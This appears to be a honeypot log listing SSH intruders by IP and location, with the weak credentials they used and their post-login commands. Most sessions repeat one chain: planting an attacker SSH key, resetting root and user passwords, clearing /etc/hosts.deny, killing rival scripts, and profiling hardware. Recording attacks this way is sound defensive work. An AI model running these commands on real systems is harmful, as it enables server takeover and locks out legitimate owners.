2026-05-18 02:25 EDT Β· as adv/123, root/!Qaz@Wsx, root/Dev@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:0QRi80Bsr8oJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123\n14meSC1uXz6m\n14meSC1uXz6m"|passwd|bash
$ Enter new UNIX password:
$ echo "123\n14meSC1uXz6m\n14meSC1uXz6m\n"|passwd
$ echo "root:rbAdEmhPMXWf"|chpasswd|bash
🎭 wraith_root_82 (43.128.73.234) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-18 01:47 EDT Β· as root/4rfv5tgb, root/zzz
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:UQ9c68ncWzrP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:A3s1ig2bRzhi"|chpasswd|bash
🎭 beefeater_root_5 (86.180.86.34) β€” Swindon, United Kingdom Β· 1 session Β· 19 cmds
2026-05-18 01:50 EDT Β· as root/P455w0RD
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:CDVZjVbGmppK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_53 (43.173.66.18) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-18 01:49 EDT Β· as root/asdfasdf
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:bzZwnj0UjSfe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_22 (121.229.9.110) β€” Nanjing, China Β· 1 session Β· 19 cmds
2026-05-18 00:51 EDT Β· as root/2010
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:4RKQj1ebbGNF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus_root_17 (159.65.153.141) β€” Bengaluru, India Β· 1 session Β· 19 cmds
2026-05-18 00:46 EDT Β· as root/c
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Hfy7XQCW13yz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_92 (43.163.81.111) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-17 22:26 EDT Β· as ftp/123456, root/qwer@1234!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:ifl6FY4oECcD"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\nsSf6ai4WuahP\nsSf6ai4WuahP"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nsSf6ai4WuahP\nsSf6ai4WuahP\n"|passwd
🎭 ghost_root_107 (43.163.97.85) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-17 22:21 EDT Β· as root/qwer@1234!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:168L1U5vbW6X"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_108 (160.187.240.90) β€” Phu Do, Vietnam Β· 1 session Β· 19 cmds
2026-05-17 22:10 EDT Β· as root/Aa@123456.
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:RiRgszDFACy7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chateau_root_16 (185.41.153.188) β€” Paris, France Β· 4 sessions Β· 62 cmds
2026-05-14 07:13 EDT Β· as linux/linux123, moon/moon, pakchoi/Kermit123@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "moon\n5iSusgcTcLYC\n5iSusgcTcLYC"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "moon\n5iSusgcTcLYC\n5iSusgcTcLYC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "z4ng0rber\nUz1odTlACtBh\nUz1odTlACtBh"|passwd|bash
$ echo "z4ng0rber\nUz1odTlACtBh\nUz1odTlACtBh\n"|passwd
$ echo -e "linux123\nDibNCCBrCXxj\nDibNCCBrCXxj"|passwd|bash
$ echo "linux123\nDibNCCBrCXxj\nDibNCCBrCXxj\n"|passwd
🎭 cipher_root_84 (193.39.208.26) β€” Mexico City, Mexico Β· 2 sessions Β· 40 cmds
2026-05-17 21:45 EDT Β· as moon/moon, supermaint/z4ng0rber
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "moon\nqAo5mTWbMMIN\nqAo5mTWbMMIN"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "moon\nqAo5mTWbMMIN\nqAo5mTWbMMIN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "z4ng0rber\nrrU2NpHKmN0z\nrrU2NpHKmN0z"|passwd|bash
$ echo "z4ng0rber\nrrU2NpHKmN0z\nrrU2NpHKmN0z\n"|passwd
🎭 meatball_3 (155.4.245.222) β€” Stockholm, Sweden Β· 1 session Β· 20 cmds
2026-05-17 21:41 EDT Β· as moon/moon
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "moon\nRkgkK8wg2Iv1\nRkgkK8wg2Iv1"|passwd|bash
$ Enter new UNIX password:
$ echo "moon\nRkgkK8wg2Iv1\nRkgkK8wg2Iv1\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_109 (43.163.107.154) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-17 21:18 EDT Β· as root/Apstndp9, root/ethereum@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:qtq4tHRMVyrh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:x3hXyyMsOtDE"|chpasswd|bash
🎭 wraith_root_83 (190.167.237.191) β€” Santo Domingo, Dominican Republic Β· 1 session Β· 19 cmds
2026-05-17 21:10 EDT Β· as root/ethereum@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
